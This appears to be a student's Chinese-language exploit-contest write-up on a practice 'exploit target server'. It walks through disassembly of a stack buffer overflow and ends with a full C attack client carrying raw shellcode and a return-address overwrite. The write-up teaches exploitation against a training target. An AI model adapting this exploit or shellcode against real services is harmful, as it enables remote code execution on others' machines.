提交者看雪ID:likunkun
职业:(学生、程序员、安全专家、黑客技术爱好者、其他?)
学生
PE分析:
本程序是一个 TCP 服务端：在 0.0.0.0:7777 上监听，accept 之后循环 recv，每收到一包就把接收缓冲区交给 00401000 显示。
从多处 `mov ecx, 00409A68` 后接 00401427 / 004012E0 / 004012B0 的调用序列看，显示是通过 C++ 流完成的（推测为 std::cout << ... << endl，未逐一验证）。
004010B0 /$ 81EC B4030000 sub esp, 3B4 ; main(): 0x3B4-byte frame holds the sockaddr, the 512-byte recv buffer and the WSADATA
004010B6 |. 8D8424 240200>lea eax, dword ptr [esp+224] ; &WSADATA (author's note: "initialise Winsock")
004010BD |. 55 push ebp
004010BE |. 50 push eax ; /pWSAData
004010BF |. 68 01010000 push 101 ; |RequestedVersion = 101 (1.1.)
004010C4 |. FF15 BC804000 call dword ptr [<&WS2_32.#115>] ; \WSAStartup -- return value is never tested
004010CA |. 6A 00 push 0 ; /Protocol = IPPROTO_IP
004010CC |. 6A 01 push 1 ; |Type = SOCK_STREAM
004010CE |. 6A 02 push 2 ; |Family = AF_INET
004010D0 |. FF15 C0804000 call dword ptr [<&WS2_32.#23>] ; \socket
004010D6 |. 8BE8 mov ebp, eax ; ebp = listening socket for the rest of main
004010D8 |. 85ED test ebp, ebp
004010DA |. 7D 33 jge short 0040110F ; signed test: only a negative handle (the -1 failure value) is treated as an error
004010DC |. 68 00914000 push 00409100 ; ASCII "socket creating error!"
004010E1 |. 55 push ebp ; /Arg1
004010E2 |. B9 689A4000 mov ecx, 00409A68 ; | ecx = stream object at 00409A68 (presumably std::cout)
004010E7 |. E8 0C070000 call 004017F8 ; \exploit_.004017F8
004010EC |. 8BC8 mov ecx, eax
004010EE |. E8 34030000 call 00401427 ; operator<<(const char*) by the look of it -- not verified
004010F3 |. 68 D0124000 push 004012D0
004010F8 |. 6A 0A push 0A ; /Arg1 = 0000000A
004010FA |. 8BC8 mov ecx, eax ; |
004010FC |. E8 DF010000 call 004012E0 ; \exploit_.004012E0
00401101 |. 8BC8 mov ecx, eax
00401103 |. E8 A8010000 call 004012B0 ; the 0A / 004012D0 pair repeats after every message; looks like "<< endl"
00401108 |. 6A 01 push 1
0040110A |. E8 430E0000 call 00401F52 ; presumably exit(1); if it returned, execution would fall into bind() with a bad socket
0040110F |> 68 611E0000 push 1E61 ; /NetShort = 1E61 = 7777 -- the listening port
00401114 |. 66:C74424 0C >mov word ptr [esp+C], 2 ; |sin_family = AF_INET
0040111B |. FF15 C4804000 call dword ptr [<&WS2_32.#9>] ; \ntohs (same byte swap as htons on x86)
00401121 |. 6A 00 push 0 ; /NetLong = 0
00401123 |. 66:894424 0E mov word ptr [esp+E], ax ; |sin_port
00401128 |. FF15 C8804000 call dword ptr [<&WS2_32.#8>] ; \ntohl(0) -> sin_addr = 0.0.0.0, i.e. bound on every interface
0040112E |. 8D4C24 08 lea ecx, dword ptr [esp+8] ; &sockaddr_in
00401132 |. 6A 10 push 10 ; /AddrLen = 10 (16.)
00401134 |. 51 push ecx ; |pSockAddr
00401135 |. 55 push ebp ; |Socket
00401136 |. 894424 18 mov dword ptr [esp+18], eax ; |sin_addr
0040113A |. FF15 CC804000 call dword ptr [<&WS2_32.#2>] ; \bind
00401140 |. 85C0 test eax, eax
00401142 |. 74 24 je short 00401168
00401144 |. 68 E0904000 push 004090E0 ; ASCII "binding stream socket error!"
00401149 |. B9 689A4000 mov ecx, 00409A68
0040114E |. E8 D4020000 call 00401427
00401153 |. 68 D0124000 push 004012D0
00401158 |. 6A 0A push 0A ; /Arg1 = 0000000A
0040115A |. 8BC8 mov ecx, eax ; |
0040115C |. E8 7F010000 call 004012E0 ; \exploit_.004012E0
00401161 |. 8BC8 mov ecx, eax
00401163 |. E8 48010000 call 004012B0 ; unlike the socket() failure path, a bind() failure only prints and falls through to listen/accept
00401168 |> 53 push ebx
00401169 |. 68 B8904000 push 004090B8 ; ASCII "**************************************" -- banner, three lines
0040116E |. B9 689A4000 mov ecx, 00409A68
00401173 |. E8 AF020000 call 00401427
00401178 |. 68 D0124000 push 004012D0
0040117D |. 6A 0A push 0A ; /Arg1 = 0000000A
0040117F |. 8BC8 mov ecx, eax ; |
00401181 |. E8 5A010000 call 004012E0 ; \exploit_.004012E0
00401186 |. 8BC8 mov ecx, eax
00401188 |. E8 23010000 call 004012B0
0040118D |. 68 94904000 push 00409094 ; ASCII " exploit target server 1.0",TAB," "
00401192 |. B9 689A4000 mov ecx, 00409A68
00401197 |. E8 8B020000 call 00401427
0040119C |. 68 D0124000 push 004012D0
004011A1 |. 6A 0A push 0A ; /Arg1 = 0000000A
004011A3 |. 8BC8 mov ecx, eax ; |
004011A5 |. E8 36010000 call 004012E0 ; \exploit_.004012E0
004011AA |. 8BC8 mov ecx, eax
004011AC |. E8 FF000000 call 004012B0
004011B1 |. 68 B8904000 push 004090B8 ; ASCII "**************************************"
004011B6 |. B9 689A4000 mov ecx, 00409A68
004011BB |. E8 67020000 call 00401427
004011C0 |. 68 D0124000 push 004012D0
004011C5 |. 6A 0A push 0A ; /Arg1 = 0000000A
004011C7 |. 8BC8 mov ecx, eax ; |
004011C9 |. E8 12010000 call 004012E0 ; \exploit_.004012E0
004011CE |. 8BC8 mov ecx, eax
004011D0 |. E8 DB000000 call 004012B0
004011D5 |. 6A 04 push 4 ; /Backlog = 4
004011D7 |. 55 push ebp ; |Socket
004011D8 |. FF15 D0804000 call dword ptr [<&WS2_32.#13>] ; \listen -- return value is never tested
004011DE |. 8D5424 08 lea edx, dword ptr [esp+8] ; &addrlen
004011E2 |. 8D4424 1C lea eax, dword ptr [esp+1C] ; &client sockaddr
004011E6 |. 52 push edx ; /pAddrLen
004011E7 |. 50 push eax ; |pSockAddr
004011E8 |. 55 push ebp ; |Socket
004011E9 |. C74424 14 100>mov dword ptr [esp+14], 10 ; |addrlen = 16
004011F1 |. FF15 D4804000 call dword ptr [<&WS2_32.#1>] ; \accept
004011F7 |. 8BD8 mov ebx, eax ; ebx = accepted client socket
004011F9 |. 83FB FF cmp ebx, -1
004011FC |. 74 7F je short 0040127D ; INVALID_SOCKET -> leave the accept loop
004011FE |. 56 push esi
004011FF |. 57 push edi
00401200 |> B9 80000000 /mov ecx, 80 ; per-recv loop: clear 0x80 dwords = 512 bytes
00401205 |. 33C0 |xor eax, eax
00401207 |. 8D7C24 34 |lea edi, dword ptr [esp+34] ; recv buffer (same address as [esp+38] after the push below)
0040120B |. 50 |push eax ; /Flags => 0
0040120C |. F3:AB |rep stos dword ptr es:[edi] ; | zeroing is what NUL-terminates a short packet for the strlen in 00401000
0040120E |. 8D4C24 38 |lea ecx, dword ptr [esp+38] ; |
00401212 |. 68 00020000 |push 200 ; |BufSize = 200 (512.) -- equals the cleared size, so recv() itself cannot overflow
00401217 |. 51 |push ecx ; |Buffer
00401218 |. 53 |push ebx ; |Socket
00401219 |. FF15 D8804000 |call dword ptr [<&WS2_32.#16>] ; \recv
0040121F |. 8BF0 |mov esi, eax ; esi = bytes received; each recv() is handled on its own, so the payload must arrive in one recv
00401221 |. 85F6 |test esi, esi
00401223 |. 7D 26 |jge short 0040124B ; 0 (peer closed) and positive counts both go to the display call
00401225 |. 68 74904000 |push 00409074 ; ASCII "reading stream message erro!"
0040122A |. B9 689A4000 |mov ecx, 00409A68
0040122F |. E8 F3010000 |call 00401427
00401234 |. 68 D0124000 |push 004012D0
00401239 |. 6A 0A |push 0A ; /Arg1 = 0000000A
0040123B |. 8BC8 |mov ecx, eax ; |
0040123D |. E8 9E000000 |call 004012E0 ; \exploit_.004012E0
00401242 |. 8BC8 |mov ecx, eax
00401244 |. E8 67000000 |call 004012B0
00401249 |. 33F6 |xor esi, esi ; on error esi = 0: the display routine is still called once, then the loop ends
0040124B |> 8D5424 34 |lea edx, dword ptr [esp+34] ; &recv buffer, the only argument to the display routine
0040124F |. 52 |push edx
00401250 |. E8 ABFDFFFF |call 00401000 ; THE OVERFLOW: 00401000 strcpy's this buffer into a 200-byte stack frame (listed below)
00401255 |. 83C4 04 |add esp, 4 ; cdecl cleanup
00401258 |. 85F6 |test esi, esi
0040125A |.^ 75 A4 |jnz short 00401200 ; keep reading while recv() returned > 0
0040125C |. 53 |push ebx ; /Socket
0040125D |. FF15 DC804000 |call dword ptr [<&WS2_32.#3>] ; \closesocket
00401263 |. 8D4424 10 |lea eax, dword ptr [esp+10] ; &addrlen (esp is 8 lower than at 004011DE: esi/edi pushed)
00401267 |. 8D4C24 24 |lea ecx, dword ptr [esp+24] ; &client sockaddr
0040126B |. 50 |push eax ; /pAddrLen
0040126C |. 51 |push ecx ; |pSockAddr
0040126D |. 55 |push ebp ; |Socket
0040126E |. FF15 D4804000 |call dword ptr [<&WS2_32.#1>] ; \accept
00401274 |. 8BD8 |mov ebx, eax
00401276 |. 83FB FF |cmp ebx, -1 ; accept loop: next client; the rest of the loop is not listed here
每次 recv 之后都会把 [esp+34] 处的 512 字节接收缓冲区传给 00401000 去显示（recv 返回 0 或出错把 esi 置 0 之后也会调用一次），只有 recv 返回值大于 0 时才继续循环收包；也就是说 payload 必须在同一次 recv 中完整到达。
关键的溢出发生在这个显示函数内部，调用点即:
0040124B |> \8D5424 34 |lea edx, dword ptr [esp+34] ; caller: address of the 512-byte recv buffer
0040124F |. 52 |push edx
00401250 |. E8 ABFDFFFF |call 00401000 ; cdecl, single argument
00401000 /$ 81EC C8000000 sub esp, 0C8 ; 0xC8 = 200-byte local buffer; the return address sits directly above it at [buffer+0xC8]
00401006 |. 83C9 FF or ecx, FFFFFFFF ; ecx = -1: unbounded count for the scasb below
00401009 |. 33C0 xor eax, eax ; al = 0: scan for the NUL terminator
0040100B |. 8D5424 00 lea edx, dword ptr [esp] ; edx = destination = bottom of the local buffer
0040100F |. 56 push esi
00401010 |. 57 push edi ; saved esi/edi live BELOW the buffer, so the overflow reaches the return address first
00401011 |. 8BBC24 D40000>mov edi, dword ptr [esp+D4] ; edi = argument (0xC8 frame + 2 pushes + return address = 0xD4)
00401018 |. 68 4C904000 push 0040904C ; ASCII "********************" -- pushed now, consumed by the display code that follows
0040101D |. F2:AE repne scas byte ptr es:[edi] ; inline strlen: scan the source up to its first 0 byte
0040101F |. F7D1 not ecx ; ecx = strlen(src) + 1 (the NUL is included in the copy)
00401021 |. 2BF9 sub edi, ecx ; rewind edi to the start of the source
00401023 |. 8BC1 mov eax, ecx ; keep the byte count
00401025 |. 8BF7 mov esi, edi ; esi = source (recv buffer)
00401027 |. 8BFA mov edi, edx ; edi = destination (200-byte local buffer)
00401029 |. C1E9 02 shr ecx, 2 ; dword count
0040102C |. F3:A5 rep movs dword ptr es:[edi], dword p>; inline strcpy: copy whole dwords ...
0040102E |. 8BC8 mov ecx, eax
00401030 |. 83E1 03 and ecx, 3 ; ... then the remaining 0-3 bytes
00401033 |. F3:A4 rep movs byte ptr es:[edi], byte ptr>; no bound against the 200-byte buffer: a source of >= 200 bytes before its NUL overwrites the return address (offset 200)
此后是显示代码（本文不列出）；函数返回时 ret 取到的就是被覆盖后的返回地址。
测试程序（攻击端，需链接 ws2_32.lib）为:
#include <Winsock2.h>
#include <stdio.h>
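/*
 * Payload for the overflow in the target's display routine (00401000).
 *
 * Layout (offsets into shellcode[]):
 *   [0..167]   168 bytes of position-independent code, failwest's shellcode as
 *              cited by the author. The bytes visibly push "user"/"32" and
 *              "west"/"fail"; what it finally does was not re-verified here.
 *   [168..199] 32 bytes of 0x31 padding, bringing the copied data to
 *              0xC8 = 200 bytes -- the size of the target's local buffer
 *              (sub esp, 0C8), so the next 4 bytes land on the return address.
 *   [200..203] RET_ADDR_BYTES, the return-address overwrite (little-endian).
 *   [204]      the implicit string NUL.
 *
 * The target copies with an inline strlen/strcpy, so the copy stops at the
 * first 0 byte: the 0x00 high byte of the address is the terminator and
 * exactly 204 bytes are copied. RET_ADDR_BYTES is hard-coded for an image at
 * 0x00400000 without ASLR; re-check it against the binary if it is rebuilt.
 * sizeof(shellcode) == 205 is what the client sends.
 */
#define RET_ADDR_BYTES "\xa4\x10\x40\x00" /* 0x004010A4, inside the 00401000 routine */

char shellcode[] =
/* [0..167] shellcode */
"\xFC\x68\x6A\x0A\x38\x1E\x68\x63\x89\xD1\x4F\x68\x32\x74\x91\x0C"
"\x8B\xF4\x8D\x7E\xF4\x33\xDB\xB7\x04\x2B\xE3\x66\xBB\x33\x32\x53"
"\x68\x75\x73\x65\x72\x54\x33\xD2\x64\x8B\x5A\x30\x8B\x4B\x0C\x8B"
"\x49\x1C\x8B\x09\x8B\x69\x08\xAD\x3D\x6A\x0A\x38\x1E\x75\x05\x95"
"\xFF\x57\xF8\x95\x60\x8B\x45\x3C\x8B\x4C\x05\x78\x03\xCD\x8B\x59"
"\x20\x03\xDD\x33\xFF\x47\x8B\x34\xBB\x03\xF5\x99\x0F\xBE\x06\x3A"
"\xC4\x74\x08\xC1\xCA\x07\x03\xD0\x46\xEB\xF1\x3B\x54\x24\x1C\x75"
"\xE4\x8B\x59\x24\x03\xDD\x66\x8B\x3C\x7B\x8B\x59\x1C\x03\xDD\x03"
"\x2C\xBB\x95\x5F\xAB\x57\x61\x3D\x6A\x0A\x38\x1E\x75\xA9\x33\xDB"
"\x53\x68\x77\x65\x73\x74\x68\x66\x61\x69\x6C\x8B\xC4\x53\x50\x50"
"\x53\xFF\x57\xFC\x53\xFF\x57\xF8"
/* [168..199] padding up to the 200-byte buffer size */
"\x31\x31\x31\x31\x31\x31\x31\x31"
"\x31\x31\x31\x31\x31\x31\x31\x31\x31\x31\x31\x31\x31\x31\x31\x31"
"\x31\x31\x31\x31\x31\x31\x31\x31"
/* [200..203] return address overwrite */
RET_ADDR_BYTES;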
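/*
 * Attack client: connects to the target server (address hard-coded below,
 * port 7777) and sends the payload in one send(). Link against ws2_32.lib.
 *
 * Returns 0 when the whole payload was sent, 1 on any Winsock failure; the
 * reason is printed together with WSAGetLastError().
 *
 * The target handles every recv() on its own and only the bytes delivered by
 * one recv() reach the vulnerable copy, so a partial send is a failed attempt:
 * the return value of send() is compared with the full payload size instead
 * of being ignored as in the original.
 */
int main(void)
{
    WSADATA wsaData;
    SOCKET sockClient;
    SOCKADDR_IN addrSrv = {0};        /* zero sin_zero too; the original left it uninitialised */
    int sent;
    int rc = 1;

    if (WSAStartup(MAKEWORD(1, 1), &wsaData) != 0) {
        printf("WSAStartup failed\n");
        return 1;
    }
    /* the original insists on exactly Winsock 1.1; kept as is */
    if (LOBYTE(wsaData.wVersion) != 1 || HIBYTE(wsaData.wVersion) != 1) {
        printf("Winsock 1.1 not available\n");
        WSACleanup();
        return 1;
    }

    sockClient = socket(AF_INET, SOCK_STREAM, 0);
    if (sockClient == (SOCKET)(~0)) {           /* INVALID_SOCKET */
        printf("socket() failed: %d\n", WSAGetLastError());
        goto out_wsa;
    }

    addrSrv.sin_family = AF_INET;
    addrSrv.sin_port = htons(7777);
    addrSrv.sin_addr.S_un.S_addr = inet_addr("192.168.1.1");  /* target; inet_addr gives INADDR_NONE on a bad string */

    if (connect(sockClient, (SOCKADDR *)&addrSrv, sizeof(SOCKADDR)) != 0) {
        printf("connect() failed: %d\n", WSAGetLastError());
        goto out_close;
    }

    sent = send(sockClient, shellcode, (int)sizeof(shellcode), 0);
    if (sent != (int)sizeof(shellcode)) {
        printf("send() returned %d, expected %d\n", sent, (int)sizeof(shellcode));
        goto out_close;
    }
    rc = 0;

out_close:
    closesocket(sockClient);
out_wsa:
    WSACleanup();
    return rc;
}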
漏洞描述:
00401000 在显示之前先用内联的 strlen/strcpy（repne scas + rep movs）把接收到的数据复制到 `sub esp, 0C8` 开出的 200 字节栈缓冲区中，复制长度完全由数据中第一个 0 字节的位置决定，没有任何边界检查。数据在遇到 0 之前长度 ≥ 200 字节时就会越过缓冲区，覆盖位于 [buf+0xC8] 的返回地址；本文的 payload 正是 168 字节 shellcode + 32 字节 0x31 填充（共 200 字节）后接 4 字节返回地址 0x004010A4，地址高位的 0x00 同时充当了终止复制的 0 字节。
shellcode描述:
请注明shellcode来源:原创,修改,引用。
原创请给出开发说明
修改请给出修改说明,并注明出处,附加被引用代码
引用请给出功能描述,并注明出处,附加被引用代码
shellcode 属于“引用”：使用的是 failwest（《0day 安全》作者）的 shellcode，按模板要求应补充功能说明与出处并附上被引用代码。从字节中可以直接看到它压入了 "user"/"32" 与 "west"/"fail" 两个字符串（"user32" 与 "failwest"）；其余行为本文未重新验证。
exploit运行截图
本机环境中有程序 HOOK 了 LoadLibrary（见下文稳定性说明），因此运行截图是在同学的电脑上得到的。
稳定性与通用性论证
稳定性方面有几点限制：(1) 返回地址 0x004010A4 是硬编码的，只对加载基址为 0x00400000、没有 ASLR/DEP 的目标有效；(2) 目标对每次 recv 的数据单独处理，payload 必须在同一次 recv 中完整到达，攻击端应检查 send 的返回值等于 sizeof(shellcode)（205 字节），原测试程序没有检查 connect 与 send 的返回值；(3) 在某些机器上，当已有软件 HOOK 了 LoadLibrary 时 shellcode 会出现问题，
目前还不清楚是哪个程序做的 HOOK。
创新性论证(可选)
返回地址被覆盖为 0x004010A4，该地址落在 00401000 函数自身的范围内（00401000–004010AF，其中的显示代码本文未列出），即复用了目标程序中已有的指令，推测是借此跳回栈上的 shellcode；具体用到的指令序列文中没有给出，需对照目标二进制确认。